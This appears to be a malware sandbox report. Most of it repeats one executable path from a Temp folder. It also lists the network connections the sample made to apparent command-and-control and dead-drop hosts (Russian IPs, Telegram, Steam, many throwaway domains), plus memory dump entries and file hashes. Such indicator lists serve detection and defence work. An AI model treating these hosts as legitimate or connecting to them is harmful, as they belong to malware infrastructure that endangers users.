"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
DE 159.69.100.232:443 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 embarkiffe.shop udp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.168.196:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.251.39.106:443 ogads-pa.googleapis.com tcp
NL 172.217.168.206:443 apis.google.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
NL 142.251.39.106:443 ogads-pa.googleapis.com udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 calmingtefxtures.run udp
US 104.21.90.174:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.96.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 boltetuurked.digital udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 exarthynature.run udp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.80.1:443 exarthynature.run tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
FR 2.18.131.137:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 crl.microsoft.com udp
NL 2.18.121.151:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.23.162.98:80 www.microsoft.com tcp
US 8.8.8.8:53 paleboreei.biz udp
US 172.67.181.243:443 paleboreei.biz tcp
US 8.8.8.8:53 bbcnas2.zapto.org udp
US 195.177.94.176:8041 bbcnas2.zapto.org tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
DE 104.194.157.122:80 104.194.157.122 tcp
US 104.21.90.174:443 calmingtefxtures.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 collapimga.fun udp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
N/A 127.0.0.1:50508 tcp

Files

memory/2392-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

memory/2392-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2392-6-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2392-7-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2392-9-0x000000000299B000-0x0000000002A02000-memory.dmp

memory/2392-8-0x0000000002994000-0x0000000002997000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d11fad64a1e5cdb5682eb282cc5d7615
SHA1 30584159b505fb4d6cfe361e0ef917d7a23cf418
SHA256 6c8c2a49e8f0ce51e4546e7ba970acef8f76e0d3ade453e1110a4f04a1d7ad13
